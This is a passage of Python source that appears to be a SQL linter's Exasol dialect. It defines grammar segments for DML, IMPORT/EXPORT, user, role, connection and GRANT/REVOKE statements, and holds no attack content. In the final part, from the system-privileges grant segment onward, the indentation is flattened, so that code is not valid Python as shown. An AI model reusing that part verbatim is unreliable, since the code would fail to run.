                Ref("TableReferenceSegment"),
                Sequence("IS", Ref("QuotedLiteralSegment"), optional=True),
                Bracketed(
                    Delimited(
                        Sequence(
                            Ref("SingleIdentifierGrammar"),
                            "IS",
                            Ref("QuotedLiteralSegment"),
                        ),
                    ),
                    optional=True,
                ),
            ),
            # Other object classes: a single IS '<comment>' clause.
            Sequence(
                OneOf(
                    "COLUMN",
                    "SCHEMA",
                    "FUNCTION",
                    "SCRIPT",
                    "USER",
                    "ROLE",
                    "CONNECTION",
                    Sequence("CONSUMER", "GROUP"),
                ),
                Ref("ObjectReferenceSegment"),
                "IS",
                Ref("QuotedLiteralSegment"),
            ),
        ),
    )
############################
# INSERT
############################
@exasol_dialect.segment(replace=True)
class InsertStatementSegment(BaseSegment):
    """A `INSERT` statement.

    https://docs.exasol.com/sql/insert.htm
    """

    type = "insert_statement"
    is_ddl = False
    is_dml = True
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith("INSERT")
    parse_grammar = Sequence(
        "INSERT",
        Ref.keyword("INTO", optional=True),
        Ref("TableReferenceSegment"),
        # Source of the rows: VALUES clause, DEFAULT VALUES, or a subquery;
        # an optional bracketed column list may also appear.
        AnyNumberOf(
            Ref("ValuesInsertClauseSegment"),
            Sequence("DEFAULT", "VALUES"),
            Ref("SelectableGrammar"),
            Ref("BracketedColumnReferenceListGrammar", optional=True),
        ),
    )
@exasol_dialect.segment()
class ValuesInsertClauseSegment(BaseSegment):
    """A `VALUES` clause like in `INSERT` (one or more bracketed row tuples)."""

    type = "values_insert_clause"
    match_grammar = Sequence(
        "VALUES",
        Delimited(
            Bracketed(
                Delimited(
                    # Each row element may be a literal, expression-like
                    # construct, DEFAULT, or even a scalar subquery.
                    Ref("LiteralGrammar"),
                    Ref("IntervalExpressionSegment"),
                    Ref("FunctionSegment"),
                    Ref("BareFunctionSegment"),
                    "DEFAULT",
                    Ref("SelectableGrammar"),
                    ephemeral_name="ValuesClauseElements",
                )
            ),
        ),
    )
############################
# UPDATE
############################
@exasol_dialect.segment(replace=True)
class UpdateStatementSegment(BaseSegment):
    """A `Update` statement.

    UPDATE <table name> SET <set clause list> [ WHERE <search condition> ]
    https://docs.exasol.com/sql/update.htm
    """

    type = "update_statement"
    is_ddl = False
    is_dml = True
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith("UPDATE")
    parse_grammar = Sequence(
        "UPDATE",
        OneOf(Ref("TableReferenceSegment"), Ref("AliasedTableReferenceGrammar")),
        Ref("SetClauseListSegment"),
        # Exasol supports UPDATE ... FROM (multi-table update).
        Ref("FromClauseSegment", optional=True),
        Ref("WhereClauseSegment", optional=True),
        Ref("PreferringClauseSegment", optional=True),
    )
@exasol_dialect.segment(replace=True)
class SetClauseListSegment(BaseSegment):
    """Overwritten from ANSI.

    `SET col = expr [, ...]` - terminated by FROM so the optional
    UPDATE ... FROM clause isn't swallowed.
    """

    type = "set_clause_list"
    match_grammar = Sequence(
        "SET",
        Indent,
        Delimited(
            Ref("SetClauseSegment"),
            terminator="FROM",
        ),
        Dedent,
    )
@exasol_dialect.segment(replace=True)
class SetClauseSegment(BaseSegment):
    """Overwritten from ANSI.

    A single `column = value` assignment within a SET clause list.
    """

    type = "set_clause"
    match_grammar = Sequence(
        Ref("ColumnReferenceSegment"),
        Ref("EqualsSegment"),
        OneOf(
            Ref("ExpressionSegment"),  # Maybe add this to ANSI to match math x=x+1
            Ref("LiteralGrammar"),
            Ref("BareFunctionSegment"),
            Ref("FunctionSegment"),
            Ref("ColumnReferenceSegment"),
            "NULL",
            "DEFAULT",
        ),
    )
############################
# MERGE
############################
@exasol_dialect.segment()
class MergeStatementSegment(BaseSegment):
    """`MERGE` statement.

    https://docs.exasol.com/sql/merge.htm
    """

    type = "merge_statement"
    is_ddl = False
    is_dml = True
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith(
        Sequence("MERGE", "INTO"),
    )
    parse_grammar = Sequence(
        "MERGE",
        "INTO",
        OneOf(Ref("TableReferenceSegment"), Ref("AliasedTableReferenceGrammar")),
        "USING",
        OneOf(
            Ref("TableReferenceSegment"),  # tables/views
            Bracketed(
                Ref("SelectableGrammar"),
            ),  # subquery
        ),
        Ref("AliasExpressionSegment", optional=True),
        Ref("JoinOnConditionSegment"),
        # MATCHED / NOT MATCHED clauses may appear in either order;
        # at least one is required.
        OneOf(
            Sequence(
                Ref("MergeMatchedClauseSegment"),
                Ref("MergeNotMatchedClauseSegment", optional=True),
            ),
            Sequence(
                Ref("MergeNotMatchedClauseSegment"),
                Ref("MergeMatchedClauseSegment", optional=True),
            ),
        ),
    )
@exasol_dialect.segment()
class MergeMatchedClauseSegment(BaseSegment):
    """The `WHEN MATCHED` clause within a `MERGE` statement."""

    type = "merge_when_matched_clause"
    match_grammar = StartsWith(
        Sequence("WHEN", "MATCHED", "THEN", OneOf("UPDATE", "DELETE")),
        terminator=Ref("MergeNotMatchedClauseSegment"),
    )
    parse_grammar = Sequence(
        "WHEN",
        "MATCHED",
        "THEN",
        # Matched rows are either updated or deleted.
        OneOf(
            Ref("MergeUpdateClauseSegment"),
            Ref("MergeDeleteClauseSegment"),
        ),
    )
@exasol_dialect.segment()
class MergeNotMatchedClauseSegment(BaseSegment):
    """The `WHEN NOT MATCHED` clause within a `MERGE` statement."""

    type = "merge_when_not_matched_clause"
    match_grammar = StartsWith(
        Sequence(
            "WHEN",
            "NOT",
            "MATCHED",
            "THEN",
        ),
        terminator=Ref("MergeMatchedClauseSegment"),
    )
    parse_grammar = Sequence(
        "WHEN",
        "NOT",
        "MATCHED",
        "THEN",
        # Unmatched rows can only be inserted.
        Ref("MergeInsertClauseSegment"),
    )
@exasol_dialect.segment()
class MergeUpdateClauseSegment(BaseSegment):
    """`UPDATE` clause within the `MERGE` statement (with optional filter)."""

    type = "merge_update_clause"
    match_grammar = Sequence(
        "UPDATE",
        Ref("SetClauseListSegment"),
        Ref("WhereClauseSegment", optional=True),
    )
@exasol_dialect.segment()
class MergeDeleteClauseSegment(BaseSegment):
    """`DELETE` clause within the `MERGE` statement (with optional filter)."""

    type = "merge_delete_clause"
    match_grammar = Sequence(
        "DELETE",
        Ref("WhereClauseSegment", optional=True),
    )
@exasol_dialect.segment()
class MergeInsertClauseSegment(BaseSegment):
    """`INSERT` clause within the `MERGE` statement."""

    type = "merge_insert_clause"
    match_grammar = Sequence(
        "INSERT",
        Ref("BracketedColumnReferenceListGrammar", optional=True),
        "VALUES",
        Bracketed(
            Delimited(
                OneOf(
                    "DEFAULT",
                    Ref("ExpressionSegment"),
                ),
            )
        ),
        Ref("WhereClauseSegment", optional=True),
    )
############################
# DELETE
############################
@exasol_dialect.segment(replace=True)
class DeleteStatementSegment(BaseSegment):
    """`DELETE` statement.

    https://docs.exasol.com/sql/delete.htm
    """

    type = "delete_statement"
    is_ddl = False
    is_dml = True
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith("DELETE")
    parse_grammar = Sequence(
        "DELETE",
        # Exasol allows `DELETE * FROM ...`.
        Ref("StarSegment", optional=True),
        "FROM",
        OneOf(Ref("TableReferenceSegment"), Ref("AliasedTableReferenceGrammar")),
        Ref("WhereClauseSegment", optional=True),
        Ref("PreferringClauseSegment", optional=True),
    )
############################
# TRUNCATE
############################
@exasol_dialect.segment(replace=True)
class TruncateStatementSegment(BaseSegment):
    """`TRUNCATE TABLE` statement.

    https://docs.exasol.com/sql/truncate.htm
    """

    type = "truncate_table"
    is_ddl = False
    is_dml = True
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith(Sequence("TRUNCATE", "TABLE"))
    parse_grammar = Sequence(
        "TRUNCATE",
        "TABLE",
        Ref("TableReferenceSegment"),
    )
############################
# IMPORT
############################
@exasol_dialect.segment()
class ImportStatementSegment(BaseSegment):
    """`IMPORT` statement.

    https://docs.exasol.com/sql/import.htm
    """

    type = "import_statement"
    is_ddl = False
    is_dml = True
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith("IMPORT")
    parse_grammar = Sequence(
        "IMPORT",
        # Optional target: a table (with optional column list), or a
        # bracketed list of column type definitions (import as subselect).
        Sequence(
            "INTO",
            OneOf(
                Sequence(
                    Ref("TableReferenceSegment"),
                    Bracketed(
                        Ref("SingleIdentifierListSegment"),
                        optional=True,
                    ),
                ),
                Bracketed(
                    Delimited(Ref("ImportColumnsSegment")),
                ),
            ),
            optional=True,
        ),
        Ref("ImportFromClauseSegment"),
    )
@exasol_dialect.segment()
class ExportStatementSegment(BaseSegment):
    """`EXPORT` statement.

    https://docs.exasol.com/sql/export.htm
    """

    type = "export_statement"
    is_ddl = False
    is_dml = True
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith("EXPORT")
    parse_grammar = Sequence(
        "EXPORT",
        # Source: a table (with optional column list) or a bracketed query.
        OneOf(
            Sequence(
                Ref("TableReferenceSegment"),
                Bracketed(
                    Ref("SingleIdentifierListSegment"),
                    optional=True,
                ),
            ),
            Bracketed(
                Ref("SelectableGrammar"),
            ),
        ),
        Ref("ExportIntoClauseSegment"),
    )
@exasol_dialect.segment()
class ExportIntoClauseSegment(BaseSegment):
    """EXPORT INTO CLAUSE.

    Destination is a database source or file (with optional REJECT clause)
    or a script.
    """

    type = "export_into_clause"
    match_grammar = Sequence(
        "INTO",
        OneOf(
            Sequence(
                OneOf(
                    Ref("ImportFromExportIntoDbSrcSegment"),
                    Ref("ImportFromExportIntoFileSegment"),
                ),
                Ref("RejectClauseSegment", optional=True),
            ),
            Ref("ImportFromExportIntoScriptSegment"),
        ),
    )
@exasol_dialect.segment()
class ImportColumnsSegment(BaseSegment):
    """IMPORT COLUMNS: a column datatype or LIKE clause in `IMPORT INTO (...)`."""

    type = "import_columns"
    match_grammar = Sequence(
        OneOf(
            Ref("ColumnDatatypeSegment"),
            Ref("CreateTableLikeClauseSegment"),
        )
    )
@exasol_dialect.segment()
class ImportFromClauseSegment(BaseSegment):
    """IMPORT FROM CLAUSE.

    Source is a database source or file (with optional ERRORS clause)
    or a script.
    """

    type = "import_from_clause"
    match_grammar = Sequence(
        "FROM",
        OneOf(
            Sequence(
                OneOf(
                    Ref("ImportFromExportIntoDbSrcSegment"),
                    Ref("ImportFromExportIntoFileSegment"),
                ),
                Ref("ImportErrorsClauseSegment", optional=True),
            ),
            Ref("ImportFromExportIntoScriptSegment"),
        ),
    )
@exasol_dialect.segment()
class ImportFromExportIntoDbSrcSegment(BaseSegment):
    """`IMPORT` from or `EXPORT` to a external database source (EXA,ORA,JDBC)."""

    type = "import_export_dbsrc"
    match_grammar = StartsWith(
        OneOf("EXA", "ORA", "JDBC"),
        terminator=OneOf(Ref("ImportErrorsClauseSegment"), Ref("RejectClauseSegment")),
    )
    parse_grammar = Sequence(
        OneOf(
            "EXA",
            "ORA",
            # JDBC requires a DRIVER = '...' specification.
            Sequence(
                "JDBC",
                Sequence(
                    "DRIVER",
                    Ref("EqualsSegment"),
                    Ref("QuotedLiteralSegment"),
                ),
            ),
        ),
        Sequence("AT", Ref("ConnectionDefinition")),
        OneOf(
            # Either a remote TABLE target/source...
            Sequence(
                "TABLE",
                Ref("TableReferenceSegment"),
                Bracketed(
                    Ref("SingleIdentifierListSegment"),
                    optional=True,
                ),
                Sequence(
                    # EXPORT only
                    AnyNumberOf(
                        OneOf("REPLACE", "TRUNCATE"),
                        Sequence(
                            "CREATED",
                            "BY",
                            Ref("QuotedLiteralSegment"),
                        ),
                        max_times=2,
                    ),
                    optional=True,
                ),
            ),
            # ...or one or more STATEMENT '...' clauses.
            AnyNumberOf(
                Sequence(
                    "STATEMENT",
                    Ref("QuotedLiteralSegment"),
                ),
                min_times=1,
            ),
        ),
    )
@exasol_dialect.segment()
class ImportFromExportIntoFileSegment(BaseSegment):
    """`IMPORT` from or `EXPORT` to a file source (FBV,CSV)."""

    type = "import_file"
    match_grammar = StartsWith(
        OneOf("CSV", "FBV", "LOCAL"),
        terminator=Ref("ImportErrorsClauseSegment"),
    )
    parse_grammar = Sequence(
        OneOf(
            # Remote files: CSV/FBV AT <connection> FILE '...' [FILE '...'] ...
            Sequence(
                OneOf(
                    "CSV",
                    "FBV",
                ),
                AnyNumberOf(
                    Sequence(
                        "AT",
                        Ref("ConnectionDefinition"),
                    ),
                    AnyNumberOf(
                        "FILE",
                        Ref("QuotedLiteralSegment"),
                        min_times=1,
                    ),
                    min_times=1,
                ),
            ),
            # Local files (client side): LOCAL [SECURE] CSV/FBV FILE '...'
            Sequence(
                "LOCAL",
                Ref.keyword("SECURE", optional=True),
                OneOf(
                    "CSV",
                    "FBV",
                ),
                AnyNumberOf(
                    "FILE",
                    Ref("QuotedLiteralSegment"),
                    min_times=1,
                ),
            ),
        ),
        OneOf(
            Ref("CSVColumnDefinitionSegment"),
            Ref("FBVColumnDefinitionSegment"),
            optional=True,
        ),
        Ref("FileOptionSegment", optional=True),
    )
@exasol_dialect.segment()
class ImportFromExportIntoScriptSegment(BaseSegment):
    """`IMPORT` from / `EXPORT` to a executed database script."""

    type = "import_script"
    match_grammar = StartsWith("SCRIPT")
    parse_grammar = Sequence(
        "SCRIPT",
        Ref("ObjectReferenceSegment"),
        Sequence("AT", Ref("ConnectionDefinition"), optional=True),
        # Optional WITH param=value ... list passed to the script.
        Sequence(
            "WITH",
            AnyNumberOf(
                Sequence(
                    Ref("ParameterNameSegment"),
                    Ref("EqualsSegment"),
                    Ref("LiteralGrammar"),
                ),
                min_times=1,
            ),
            optional=True,
        ),
    )
@exasol_dialect.segment()
class ImportErrorsClauseSegment(BaseSegment):
    """`ERRORS` clause: where to write rejected rows during IMPORT."""

    type = "import_errors_clause"
    match_grammar = StartsWith(
        "ERRORS",
    )
    parse_grammar = Sequence(
        "ERRORS",
        "INTO",
        Ref("ImportErrorDestinationSegment"),
        Bracketed(
            Ref("ExpressionSegment"),  # maybe wrong implementation?
            optional=True,
        ),
        OneOf(
            "REPLACE",
            "TRUNCATE",
            optional=True,
        ),
        Ref("RejectClauseSegment", optional=True),
    )
@exasol_dialect.segment()
class ImportErrorDestinationSegment(BaseSegment):
    """Error destination (csv file or table)."""

    type = "import_error_destination"
    match_grammar = OneOf(
        # Remote CSV file at a connection.
        Sequence(
            "CSV",
            Sequence("AT", Ref("ConnectionDefinition")),
            "FILE",
            Ref("QuotedLiteralSegment"),
        ),
        # Local (client side) CSV file.
        Sequence(
            "LOCAL",
            Ref.keyword("SECURE", optional=True),
            "CSV",
            "FILE",
            Ref("QuotedLiteralSegment"),
        ),
        # Database table.
        Sequence(
            Ref("TableReferenceSegment"),
        ),
    )
@exasol_dialect.segment()
class RejectClauseSegment(BaseSegment):
    """`REJECT` clause within an import / export statement."""

    type = "reject_clause"
    match_grammar = StartsWith("REJECT")
    parse_grammar = Sequence(
        "REJECT",
        "LIMIT",
        # Maximum number of rejected rows, or UNLIMITED.
        OneOf(
            Ref("NumericLiteralSegment"),
            "UNLIMITED",
        ),
        Ref.keyword("ERRORS", optional=True),
    )
@exasol_dialect.segment()
class CSVColumnDefinitionSegment(BaseSegment):
    """Definition of csv columns within an `IMPORT` / `EXPORT` statement."""

    type = "csv_cols"
    match_grammar = Bracketed(
        Delimited(
            Sequence(
                # Column selector: a single column number or a range.
                OneOf(
                    Ref("NumericLiteralSegment"),
                    Sequence(
                        # Expression 1..3, for col 1, 2 and 3
                        Ref("NumericLiteralSegment"),
                        Ref("RangeOperator"),
                        Ref("NumericLiteralSegment"),
                    ),
                ),
                Sequence(
                    "FORMAT",
                    Ref("EqualsSegment"),
                    Ref("QuotedLiteralSegment"),
                    optional=True,
                ),
                Sequence(
                    # EXPORT only
                    "DELIMIT",
                    Ref("EqualsSegment"),
                    OneOf("ALWAYS", "NEVER", "AUTO"),
                    optional=True,
                ),
            ),
        )
    )
@exasol_dialect.segment()
class FBVColumnDefinitionSegment(BaseSegment):
    """Definition of fbv columns within an `IMPORT` / `EXPORT` statement."""

    type = "fbv_cols"
    match_grammar = Bracketed(
        Delimited(
            AnyNumberOf(
                # IMPORT valid: SIZE, START, FORMAT, PADDING, ALIGN
                # EXPORT valid: SIZE, FORMAT, ALIGN, PADDING
                Sequence(
                    OneOf("SIZE", "START"),
                    Ref("EqualsSegment"),
                    Ref("NumericLiteralSegment"),
                ),
                Sequence(
                    OneOf("FORMAT", "PADDING"),
                    Ref("EqualsSegment"),
                    Ref("QuotedLiteralSegment"),
                ),
                Sequence(
                    "ALIGN",
                    Ref("EqualsSegment"),
                    OneOf("LEFT", "RIGHT"),
                ),
            ),
        )
    )
@exasol_dialect.segment()
class FileOptionSegment(BaseSegment):
    """File options for CSV/FBV `IMPORT` / `EXPORT` clauses."""

    type = "file_opts"
    match_grammar = AnyNumberOf(
        OneOf(
            # IMPORT valid: ENCODING, NULL, ROW SEPARATOR, COLUMN SEPARATOR / DELIMITER
            # TRIM, LTRIM, RTRIM, SKIP, ROW SIZE
            # EXPORT valid: REPLACE, TRUNCATE, ENCODING, NULL, BOOLEAN, ROW SEPARATOR
            # COLUMN SEPARATOR / DELIMITER, DELIMIT, WITH COLUMN NAMES
            "ENCODING",
            "NULL",
            "BOOLEAN",
            Sequence("ROW", "SEPARATOR"),
            Sequence(
                "COLUMN",
                OneOf("SEPARATOR", "DELIMITER"),
            ),
            Ref("EqualsSegment"),
            Ref("QuotedLiteralSegment"),
        ),
        OneOf("TRIM", "LTRIM", "RTRIM"),
        # SKIP = n / ROW SIZE = n
        Sequence(
            OneOf(
                "SKIP",
                Sequence("ROW", "SIZE"),
            ),
            Ref("EqualsSegment"),
            Ref("NumericLiteralSegment"),
        ),
        "REPLACE",
        "TRUNCATE",
        Sequence(
            "WITH",
            "COLUMN",
            "NAMES",
        ),
        Sequence(
            # EXPORT only
            "DELIMIT",
            Ref("EqualsSegment"),
            OneOf("ALWAYS", "NEVER", "AUTO"),
        ),
    )
############################
# USER
############################
@exasol_dialect.segment()
class CreateUserSegment(BaseSegment):
    """`CREATE USER` statement.

    https://docs.exasol.com/sql/create_user.htm
    """

    type = "create_user"
    is_ddl = False
    is_dml = False
    is_dql = False
    is_dcl = True
    match_grammar = StartsWith(
        Sequence("CREATE", "USER"),
    )
    parse_grammar = Sequence(
        "CREATE",
        "USER",
        Ref("NakedIdentifierSegment"),
        "IDENTIFIED",
        # Exactly one authentication method.
        OneOf(
            Ref("UserPasswordAuthSegment"),
            Ref("UserKerberosAuthSegment"),
            Ref("UserLDAPAuthSegment"),
        ),
    )
@exasol_dialect.segment()
class AlterUserSegment(BaseSegment):
    """`ALTER USER` statement.

    https://docs.exasol.com/sql/alter_user.htm
    """

    type = "alter_user"
    is_ddl = False
    is_dml = False
    is_dql = False
    is_dcl = True
    match_grammar = StartsWith(
        Sequence("ALTER", "USER"),
    )
    parse_grammar = Sequence(
        "ALTER",
        "USER",
        Ref("NakedIdentifierSegment"),
        OneOf(
            # Change the authentication method / password.
            Sequence(
                "IDENTIFIED",
                OneOf(
                    Sequence(
                        Ref("UserPasswordAuthSegment"),
                        # REPLACE '<old password>' - old password check.
                        Sequence(
                            "REPLACE",
                            Ref("QuotedIdentifierSegment"),
                            optional=True,
                        ),
                    ),
                    Ref("UserLDAPAuthSegment"),
                    Ref("UserKerberosAuthSegment"),
                ),
            ),
            Sequence(
                "PASSWORD_EXPIRY_POLICY",
                Ref("EqualsSegment"),
                Ref("QuotedLiteralSegment"),
            ),
            Sequence("PASSWORD", "EXPIRE"),
            Sequence("RESET", "FAILED", "LOGIN", "ATTEMPTS"),
            Sequence(
                "SET",
                "CONSUMER_GROUP",
                Ref("EqualsSegment"),
                OneOf(Ref("NakedIdentifierSegment"), "NULL"),
            ),
        ),
    )
@exasol_dialect.segment()
class UserPasswordAuthSegment(BaseSegment):
    """User password authentication: `BY "<password>"`."""

    type = "password_auth"
    match_grammar = Sequence(
        # password
        "BY",
        Ref("QuotedIdentifierSegment"),
    )
@exasol_dialect.segment()
class UserKerberosAuthSegment(BaseSegment):
    """User Kerberos authentication: `BY KERBEROS PRINCIPAL '<principal>'`."""

    type = "kerberos_auth"
    match_grammar = StartsWith(Sequence("BY", "KERBEROS"))
    parse_grammar = Sequence(
        "BY",
        "KERBEROS",
        "PRINCIPAL",
        Ref("QuotedLiteralSegment"),
    )
@exasol_dialect.segment()
class UserLDAPAuthSegment(BaseSegment):
    """User LDAP authentication: `AT LDAP AS '<dn>' [FORCE]`."""

    type = "ldap_auth"
    match_grammar = StartsWith(Sequence("AT", "LDAP"))
    parse_grammar = Sequence(
        "AT",
        "LDAP",
        "AS",
        Ref("QuotedLiteralSegment"),
        Ref.keyword("FORCE", optional=True),
    )
############################
# CONSUMER GROUP
############################
@exasol_dialect.segment()
class CreateConsumerGroupSegment(BaseSegment):
    """`CREATE CONSUMER GROUP` statement with its WITH parameter list."""

    type = "create_consumer_group_statement"
    match_grammar = Sequence(
        "CREATE",
        "CONSUMER",
        "GROUP",
        Ref("NakedIdentifierSegment"),
        "WITH",
        Delimited(Ref("ConsumerGroupParameterSegment")),
    )
@exasol_dialect.segment()
class AlterConsumerGroupSegment(BaseSegment):
    """`ALTER CONSUMER GROUP` statement with its SET parameter list."""

    type = "alter_consumer_group_statement"
    match_grammar = Sequence(
        "ALTER",
        "CONSUMER",
        "GROUP",
        Ref("NakedIdentifierSegment"),
        "SET",
        Delimited(Ref("ConsumerGroupParameterSegment")),
    )
@exasol_dialect.segment()
class ConsumerGroupParameterSegment(BaseSegment):
    """Consumer Group Parameters: `<name> = <value>` assignments."""

    type = "consumer_group_parameter"
    match_grammar = Sequence(
        OneOf(
            "CPU_WEIGHT",
            "PRECEDENCE",
            "GROUP_TEMP_DB_RAM_LIMIT",
            "USER_TEMP_DB_RAM_LIMIT",
            "SESSION_TEMP_DB_RAM_LIMIT",
        ),
        Ref("EqualsSegment"),
        # RAM limits are quoted strings; weights are plain numbers.
        OneOf(Ref("QuotedLiteralSegment"), Ref("NumericLiteralSegment")),
    )
############################
# ROLE
############################
@exasol_dialect.segment()
class CreateRoleSegment(BaseSegment):
    """`CREATE ROLE` statement.

    https://docs.exasol.com/sql/create_role.htm
    """

    type = "create_role"
    is_ddl = False
    is_dml = False
    is_dql = False
    is_dcl = True
    match_grammar = StartsWith(
        Sequence("CREATE", "ROLE"),
    )
    parse_grammar = Sequence(
        "CREATE",
        "ROLE",
        Ref("NakedIdentifierSegment"),
    )
@exasol_dialect.segment()
class AlterRoleSegment(BaseSegment):
    """`ALTER ROLE` statement.

    Only allowed to alter CONSUMER GROUPs
    """

    type = "alter_role"
    is_ddl = False
    is_dml = False
    is_dql = False
    is_dcl = True
    match_grammar = StartsWith(
        Sequence("ALTER", "ROLE"),
    )
    parse_grammar = Sequence(
        "ALTER",
        "ROLE",
        Ref("NakedIdentifierSegment"),
        "SET",
        Sequence(
            "CONSUMER_GROUP",
            Ref("EqualsSegment"),
            # NULL resets the role to no consumer group.
            OneOf(Ref("NakedIdentifierSegment"), "NULL"),
        ),
    )
############################
# CONNECTION
############################
@exasol_dialect.segment()
class CreateConnectionSegment(BaseSegment):
    """`CREATE CONNECTION` statement.

    https://docs.exasol.com/sql/create_connection.htm
    """

    type = "create_connection"
    is_ddl = False
    is_dml = False
    is_dql = False
    is_dcl = True
    match_grammar = StartsWith(
        Sequence("CREATE", Ref("OrReplaceGrammar", optional=True), "CONNECTION"),
    )
    parse_grammar = Sequence(
        "CREATE",
        Ref("OrReplaceGrammar", optional=True),
        "CONNECTION",
        Ref("NakedIdentifierSegment"),
        "TO",
        Ref("ConnectionDefinition"),
    )
@exasol_dialect.segment()
class AlterConnectionSegment(BaseSegment):
    """`ALTER CONNECTION` statement.

    https://docs.exasol.com/sql/alter_connection.htm
    """

    type = "alter_connection"
    is_ddl = False
    is_dml = False
    is_dql = False
    is_dcl = True
    match_grammar = StartsWith(
        Sequence("ALTER", "CONNECTION"),
    )
    parse_grammar = Sequence(
        "ALTER",
        "CONNECTION",
        Ref("NakedIdentifierSegment"),
        "TO",
        Ref("ConnectionDefinition"),
    )
@exasol_dialect.segment()
class ConnectionDefinition(BaseSegment):
    """Definition of a connection: target plus optional USER/IDENTIFIED BY."""

    type = "connection_definition"
    match_grammar = Sequence(
        OneOf(
            # string or identifier
            Ref("SingleIdentifierGrammar"),
            Ref("QuotedLiteralSegment"),
        ),
        # Optional credentials: USER '...' IDENTIFIED BY '...'.
        Sequence(
            "USER",
            Ref("QuotedLiteralSegment"),
            "IDENTIFIED",
            "BY",
            Ref("QuotedLiteralSegment"),
            optional=True,
        ),
    )
############################
# GRANT / REVOKE
############################
@exasol_dialect.segment(replace=True)
class AccessStatementSegment(BaseSegment):
    """`GRANT` / `REVOKE` statement.

    https://docs.exasol.com/sql/grant.htm
    https://docs.exasol.com/sql/revoke.htm
    """

    type = "access_statement"
    is_ddl = False
    is_dml = False
    is_dql = False
    is_dcl = True
    match_grammar = StartsWith(
        OneOf("GRANT", "REVOKE"),
    )
    # GRANT and REVOKE share the same overall shape; each privilege family
    # (system, object, role, impersonation, connection) is factored out into
    # its own sub-segment below.
    parse_grammar = Sequence(
        OneOf("GRANT", "REVOKE"),
        OneOf(
            Ref("GrantRevokeSystemPrivilegesSegment"),
            Ref("GrantRevokeObjectPrivilegesSegment"),
            Ref("GrantRevokeRolesSegment"),
            Ref("GrantRevokeImpersonationSegment"),
            Ref("GrantRevokeConnectionSegment"),
            Ref("GrantRevokeConnectionRestrictedSegment"),
        ),
    )
@exasol_dialect.segment()
class GrantRevokeSystemPrivilegesSegment(BaseSegment):
"""`GRANT` / `REVOKE` system privileges."""
type = "grant_revoke_system_privileges"
match_grammar = Sequence(
OneOf(
Sequence(
"ALL",
Ref.keyword(
"PRIVILEGES",
optional=True,
),
),
Delimited(
Ref("SystemPrivilegesSegment"),
terminator=OneOf("TO", "FROM"),
),
),
OneOf("TO", "FROM"),
Delimited(
Ref("NakedIdentifierSegment"),
),
Sequence("WITH", "ADMIN", "OPTION", optional=True), # Grant only
)
@exasol_dialect.segment()
class GrantRevokeObjectPrivilegesSegment(BaseSegment):
"""`GRANT` / `REVOKE` object privileges."""
type = "grant_revoke_object_privileges"
match_grammar = Sequence(
OneOf(
Sequence("ALL", Ref.keyword("PRIVILEGES", optional=True)),
Delimited(Ref("ObjectPrivilegesSegment"), terminator="ON"),
),
"ON",
OneOf(
OneOf("SCHEMA", "TABLE", "VIEW", "FUNCTION", "SCRIPT"),
Sequence("ALL", Ref.keyword("OBJECTS", optional=True)), # Revoke only
optional=True,
),
Ref("ObjectReferenceSegment"),
OneOf(
Sequence( # Grant only
"TO",
Delimited(Ref("NakedIdentifierSegment")),
),
Sequence( # Revoke only
"FROM",
Delimited(Ref("NakedIdentifierSegment")),
Sequence("CASCADE", "CONSTRAINTS", optional=True),
),
),
)
@exasol_dialect.segment()
class GrantRevokeRolesSegment(BaseSegment):
"""`GRANT` / `REVOKE` roles."""
type = "grant_revoke_roles"
match_grammar = Sequence(
OneOf(
Sequence("ALL", "ROLES"), # Revoke only
Delimited(Ref("NakedIdentifierSegment"), terminator=OneOf("TO", "FROM")),
),
OneOf("TO", "FROM"),
Delimited(Ref("NakedIdentifierSegment")),
Sequence("WITH", "ADMIN", "OPTION", optional=True), # Grant only
)
@exasol_dialect.segment()
class GrantRevokeImpersonationSegment(BaseSegment):
"""`GRANT` / `REVOKE` impersonation."""
type = "grant_revoke_impersonation"
match_grammar = Sequence(
"IMPERSONATION",
"ON",
Delimited(
Ref("NakedIdentifierSegment"),
terminator=OneOf("TO", "FROM"),
),
OneOf("TO", "FROM"),
Delimited(Ref("NakedIdentifierSegment")),
)
@exasol_dialect.segment()
class GrantRevokeConnectionSegment(BaseSegment):
"""`GRANT` / `REVOKE` connection."""
type = "grant_revoke_connection"
match_grammar = Sequence(
"CONNECTION",
Delimited(
Ref("NakedIdentifierSegment"),
terminator=OneOf("TO", "FROM"),
),
OneOf("TO", "FROM"),
Delimited(Ref("NakedIdentifierSegment")),
Sequence("WITH", "ADMIN", "OPTION", optional=True),
)
@exasol_dialect.segment()
class GrantRevokeConnectionRestrictedSegment(BaseSegment):
"""`GRANT` / `REVOKE` connection restricted."""
type = "grant_revoke_connection_restricted"
match_grammar = Sequence(
"ACCESS",
"ON",
"CONNECTION",
Ref("NakedIdentifierSegment"),
Sequence(
"FOR",
OneOf("SCRIPT", "SCHEMA", optional=True),
Ref("NakedIdentifierSegment"),
),
OneOf("TO", "FROM"),
Delimited(Ref("NakedIdentifierSegment")),
)
@exasol_dialect.segment()
class SystemPrivilegesSegment(BaseSegment):
"""System privileges.
https://docs.exasol.com/database_concepts/privileges/details_rights_management.htm#System_Privileges
"""
type = "system_privilege"
match_grammar = OneOf(
Sequence("GRANT", "ANY", "OBJECT", "PRIVILEGE"),
Sequence("GRANT", "ANY", "PRIVILEGE"),
Sequence("SET", "ANY", "CONSUMER", "GROUP"),
Sequence("MANAGE", "CONSUMER", "GROUPS"),
Sequence("KILL", "ANY", "SESSION"),
Sequence("ALTER", "SYSTEM"),
Sequence(OneOf("CREATE", "ALTER", "DROP"), "USER"),
Sequence("IMPERSONATE", "ANY", "USER"),
Sequence(OneOf("DROP", "GRANT"), "ANY", "ROLE"),
Sequence(OneOf("ALTER", "DROP", "GRANT", "USE", "ACCESS"), "ANY", "CONNECTION"),
Sequence("CREATE", Ref.keyword("VIRTUAL", optional=True), "SCHEMA"),
Sequence(
OneOf("ALTER", "DROP", "USE"),
"ANY",
Ref.keyword("VIRTUAL", optional=True),
"SCHEMA",
Ref.keyword("REFRESH", optional=True),
),
Sequence(
"CREATE",
OneOf(
"TABLE", "VIEW", "CONNECTION", "ROLE", "SESSION", "FUNCTION", "SCRIPT"
),
),
Sequence(
OneOf("CREATE", "ALTER", "DELETE", "DROP", "INSERT", "SELECT", "UPDATE"),
"ANY",
"TABLE",
),
